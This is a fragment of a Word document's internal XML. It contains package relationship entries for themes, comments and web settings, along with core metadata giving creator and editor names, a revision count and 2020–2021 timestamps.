    <w:rsid w:val="003333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gb2312"/>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theme" Target="theme/theme1.xml" Id="rId15" /><Relationship Type="http://schemas.microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml" Id="rId9" /><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="people.xml" Id="rId14" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R823aab1a1a844a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Taneli, Doruk</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Apostolopoulos, Alex</lastModifiedBy>
  <revision>48</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-05T10:37:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-17T10:37:01.5362857Z</dcterms:modified>
</coreProperties>
</file>